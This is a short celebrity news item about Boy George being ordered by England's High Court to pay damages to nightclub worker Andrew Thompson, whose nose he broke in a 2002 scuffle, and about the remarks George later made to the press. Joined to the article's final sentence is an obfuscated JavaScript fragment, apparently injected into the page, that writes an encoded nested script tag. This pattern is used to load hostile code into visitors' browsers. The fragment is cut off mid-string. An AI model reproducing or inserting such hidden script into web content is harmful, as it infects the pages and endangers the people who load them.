Boy George found himself in a bit of trouble back in June 2002 for punching a nightclub employee named Andrew Thompson during a night out at the now defunct Sweet Suite.
Boy 'Do You Really Want To Hurt Me' George has been a popular club DJ for the past decade, as well as the creator of musical theatre's Taboo.
A couple of months after the incident George wrote about it in his column in U.K. newspaper The Sunday Express and spoke about it during an interview in Boyz, a magazine popular among London's gay population.
Now, George, who is among the latest spokespeople for MAC cosmetics, is about $20,000 lighter in the wallet, having been ordered by Mr. Justice Tugendhat of England's High Court to make amends for libel damages. Thompson's nose was broken during the scuffle, so he is paying for the injury and the distress faced by the victim.
Anyone who knows anything about Boy George knows that he has a pretty sharp tongue and is prone to making witty and caustic remarks, but usually his imposing stature keeps him out of any real trouble. There's no word on what prompted George to take a swing at Thompson, but in the Boyz article, George said that Thompson "insulted and provoked him." During the court case, he accepted that hitting Thompson was wrong as was making allegations to the press.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
